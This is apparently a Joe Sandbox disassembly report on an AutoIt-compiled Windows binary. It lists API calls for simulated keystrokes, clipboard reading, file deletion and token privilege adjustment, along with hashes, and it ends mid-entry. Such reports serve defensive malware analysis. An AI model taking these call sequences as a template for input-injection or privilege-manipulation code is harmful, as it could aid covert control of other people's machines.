                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00D8F796
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE4388
                                                                                                                  • IsIconic.USER32(000000FF), ref: 00DE4391
                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00DE439E
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE43A8
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DE43BE
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DE43C5
                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00DE43D1
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DE43E2
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DE43EA
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DE43F2
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE43F5
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE440A
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4415
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE441F
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4424
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE442D
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4432
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE443C
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4441
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE4444
                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00DE446B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: a9be6a1e240a2bc902ec6f66064105e2de8cc05f4a1d45affabb92414f76757f
                                                                                                                  • Instruction ID: 1e6782e26540d318a8e03924db380382b8cdddedfbdb2f3020667fc29fee1d58
                                                                                                                  • Opcode Fuzzy Hash: a9be6a1e240a2bc902ec6f66064105e2de8cc05f4a1d45affabb92414f76757f
                                                                                                                  • Instruction Fuzzy Hash: D7315271A40358BBEB216B729C49F7F3E6EEB44B50F108015FA05EA2D0C6B09901EAB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E322E8,?,00000000,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?), ref: 00D7BE8B
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?,00000002), ref: 00D7BEA7
                                                                                                                  • __wsplitpath.LIBCMT ref: 00D7BF19
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7BF31
                                                                                                                  • _wcscat.LIBCMT ref: 00D7BF46
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D7BF56
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7C03E
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7C1ED
                                                                                                                  • SetCurrentDirectoryW.KERNEL32 ref: 00D7C250
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D7C320: _memmove.LIBCMT ref: 00D7C419
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$"
                                                                                                                  • API String ID: 2542276039-3082565913
                                                                                                                  • Opcode ID: d598c76974303ab711b41c34f99fb2d63919c34139bf0aeb304242f6cc4819e4
                                                                                                                  • Instruction ID: 12f3eebb593bce440b4c8ae98db66b423ad20d3d7c09478b346a5bc97efe872f
                                                                                                                  • Opcode Fuzzy Hash: d598c76974303ab711b41c34f99fb2d63919c34139bf0aeb304242f6cc4819e4
                                                                                                                  • Instruction Fuzzy Hash: 48427F715083459FD710EF60D885BABB7E8EF94300F44892DF58997252EB31EA49CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00DB7B9F: __wsplitpath.LIBCMT ref: 00DB7BBC
                                                                                                                    • Part of subcall function 00DB7B9F: __wsplitpath.LIBCMT ref: 00DB7BCF
                                                                                                                    • Part of subcall function 00DB7C0C: GetFileAttributesW.KERNEL32(?,00DB6A7B), ref: 00DB7C0D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6B9D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6BBB
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6BE2
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DB6BF8
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB6C57
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6C6A
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6C7D
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00DB6CAB
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6CBC
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6CDB
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6CEA
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00DB6CFF
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6D10
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DB6D37
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6D53
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6D61
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1867810238-1173974218
                                                                                                                  • Opcode ID: c782c911820b0f4193a44135a637d3ebce6af52e5ee03b4034c94e7c09acd14b
                                                                                                                  • Instruction ID: db5bb0e652948ac76d1b87f3381c89cde73d0471ee23b63240858f0e39f476e9
                                                                                                                  • Opcode Fuzzy Hash: c782c911820b0f4193a44135a637d3ebce6af52e5ee03b4034c94e7c09acd14b
                                                                                                                  • Instruction Fuzzy Hash: 2E510F72904258AADF21DBA0CC45EEE777DAF09304F4845DAE55AE2141EB34DB88CF71
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(00E0DBF0), ref: 00DC70C3
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DC70D1
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00DC70D9
                                                                                                                  • CloseClipboard.USER32 ref: 00DC70E5
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DC7101
                                                                                                                  • CloseClipboard.USER32 ref: 00DC710B
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DC7120
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00DC712D
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00DC7135
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DC7142
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DC7176
                                                                                                                  • CloseClipboard.USER32 ref: 00DC7283
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3222323430-0
                                                                                                                  • Opcode ID: 3b2075e167788a81cc95ab907fd21f5d34f0cd508b9f80e0ef969d61e964ec83
                                                                                                                  • Instruction ID: 1287ace438f8ece23c658529113af051fa941c9053392bbb20b7ff832b5c2b6b
                                                                                                                  • Opcode Fuzzy Hash: 3b2075e167788a81cc95ab907fd21f5d34f0cd508b9f80e0ef969d61e964ec83
                                                                                                                  • Instruction Fuzzy Hash: 83518E31208306ABD311AB64DC86F7EB7AAAB84B11F04851DF54AD72D1EB70D905DB72
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DABF0F
                                                                                                                    • Part of subcall function 00DABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DABF3C
                                                                                                                    • Part of subcall function 00DABEC3: GetLastError.KERNEL32 ref: 00DABF49
                                                                                                                  • _memset.LIBCMT ref: 00DABA34
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00DABA86
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DABA97
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DABAAE
                                                                                                                  • GetProcessWindowStation.USER32 ref: 00DABAC7
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00DABAD1
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DABAEB
                                                                                                                    • Part of subcall function 00DAB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DAB9EC), ref: 00DAB8C5
                                                                                                                    • Part of subcall function 00DAB8B0: CloseHandle.KERNEL32(?,?,00DAB9EC), ref: 00DAB8D7
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                  • String ID: $default$winsta0
                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                  • Opcode ID: 377a5924e0a82e5266e9c0a377086fdb8dbc759b88c934cd71586bd76f37e205
                                                                                                                  • Instruction ID: 36febcd10c61f042952bd0356d6917c9a2595af7bf103c06eedc4ffb035958e1
                                                                                                                  • Opcode Fuzzy Hash: 377a5924e0a82e5266e9c0a377086fdb8dbc759b88c934cd71586bd76f37e205
                                                                                                                  • Instruction Fuzzy Hash: 98818071800209AFDF119FA4DD45EFEBB79EF05324F18811AF915A6252DB318E16EB31
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DBFE03
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DBFE57
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DBFE7C
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DBFE93
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DBFEBA
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF06
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF3F
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF93
                                                                                                                    • Part of subcall function 00D9234B: __woutput_l.LIBCMT ref: 00D923A4
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFFE1
                                                                                                                  • __swprintf.LIBCMT ref: 00DC0030
                                                                                                                  • __swprintf.LIBCMT ref: 00DC007F
                                                                                                                  • __swprintf.LIBCMT ref: 00DC00CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 108614129-2428617273
                                                                                                                  • Opcode ID: 4758cb4bc5ff31ae5baefa74732437f057088c0b18258d4b2682fc14421ba610
                                                                                                                  • Instruction ID: 948ac366e422c14e33c827fa552811992cc25fdf0e242d2ce3394038936460aa
                                                                                                                  • Opcode Fuzzy Hash: 4758cb4bc5ff31ae5baefa74732437f057088c0b18258d4b2682fc14421ba610
                                                                                                                  • Instruction Fuzzy Hash: 61A1F9B2418344ABC311EBA4C896DBFB7EDEF98700F44495DB585C2151EB34EA49CBB2
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC2065
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC207A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2091
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00DC20A3
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00DC20BD
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DC20D5
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC20E0
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC20FC
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2123
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC213A
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC214C
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E23A68), ref: 00DC216A
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC2174
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2181
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2191
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                  • Opcode ID: f802dcce346ab428f2c52129ec6a7132f2e72d306ae91b3ebd28871cfab81bbf
                                                                                                                  • Instruction ID: 25f630f0aef2f530d83e5078dcee555e7a28755f9545ccbf22effa93931ac41c
                                                                                                                  • Opcode Fuzzy Hash: f802dcce346ab428f2c52129ec6a7132f2e72d306ae91b3ebd28871cfab81bbf
                                                                                                                  • Instruction Fuzzy Hash: 90317E71A0031A7ADF10ABA4EC49FFE77AD9F05360F18416AE915E3190DB74DA44CE74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00DDF14B
                                                                                                                    • Part of subcall function 00DDD5EE: ClientToScreen.USER32(?,?), ref: 00DDD617
                                                                                                                    • Part of subcall function 00DDD5EE: GetWindowRect.USER32(?,?), ref: 00DDD68D
                                                                                                                    • Part of subcall function 00DDD5EE: PtInRect.USER32(?,?,00DDEB2C), ref: 00DDD69D
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DDF1B4
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DDF1BF
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DDF1E2
                                                                                                                  • _wcscat.LIBCMT ref: 00DDF212
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DDF229
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DDF242
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00DDF259
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00DDF27B
                                                                                                                  • DragFinish.SHELL32(?), ref: 00DDF282
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00DDF36D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                  • Opcode ID: 412c6ddaa3787b5e079a182735932e63073fc2a37fa77aeaaf2adb5841f54d87
                                                                                                                  • Instruction ID: 5e68632e50207f27664343bf042384f3c985c2f5addc1bc88774afdb98e5b558
                                                                                                                  • Opcode Fuzzy Hash: 412c6ddaa3787b5e079a182735932e63073fc2a37fa77aeaaf2adb5841f54d87
                                                                                                                  • Instruction Fuzzy Hash: AE612871108304AFC711EF64DC85EABBBE9FF89710F104A1EF595A62A1DB709A05CB72
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC21C0
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC21D5
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC21EC
                                                                                                                    • Part of subcall function 00DB7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DB7621
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DC221B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC2226
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC2242
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2269
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2280
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC2292
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E23A68), ref: 00DC22B0
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC22BA
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC22C7
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC22D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                  • Opcode ID: fc569f6c8b4646a911f23395d8e5b2aecdbf3a95cdb37d1bce63cd983ad26bb3
                                                                                                                  • Instruction ID: e1f228c9afc602f7073f3c1d8a59ee48e63b155daf3a82ca68609ccd92c30c16
                                                                                                                  • Opcode Fuzzy Hash: fc569f6c8b4646a911f23395d8e5b2aecdbf3a95cdb37d1bce63cd983ad26bb3
                                                                                                                  • Instruction Fuzzy Hash: 5D31A03190131A7ADF10ABA4EC49FFEB7AD9F45320F284169E815E3190DB709A85CE78
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove_memset
                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                  • Opcode ID: 408b93c1d62aadf6ebe298ff11cd34ef2c6229268e4d11bcdff712ca40a026cd
                                                                                                                  • Instruction ID: ec2f4e7b5b6e96f1cc41e1fa5f8b348073ab9e2b4a7378025263a7512c59abb1
                                                                                                                  • Opcode Fuzzy Hash: 408b93c1d62aadf6ebe298ff11cd34ef2c6229268e4d11bcdff712ca40a026cd
                                                                                                                  • Instruction Fuzzy Hash: D4729C71D04219CBDB24CF98C9806BDBBB1FF44314F29C1A9D959AB281E774EE81DB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DDED0C
                                                                                                                  • GetFocus.USER32 ref: 00DDED1C
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00DDED27
                                                                                                                  • _memset.LIBCMT ref: 00DDEE52
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00DDEE7D
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00DDEE9D
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00DDEEB0
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DDEEE4
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DDEF2C
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DDEF64
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00DDEF99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                  • Opcode ID: 65412ce5428f882f2e617a8c5ed9cca4cfb37f92571d7a100595d3eb960c27bc
                                                                                                                  • Instruction ID: da7def4e623f0a606b4c1835447fd6b76b5d67fabb10a2769418d753d862b7f9
                                                                                                                  • Opcode Fuzzy Hash: 65412ce5428f882f2e617a8c5ed9cca4cfb37f92571d7a100595d3eb960c27bc
                                                                                                                  • Instruction Fuzzy Hash: 91815B71108311AFDB10EF25D884A6ABBE6FF88354F04492EF9999B391D730D905CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                    • Part of subcall function 00DAB8E7: GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                    • Part of subcall function 00DAB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
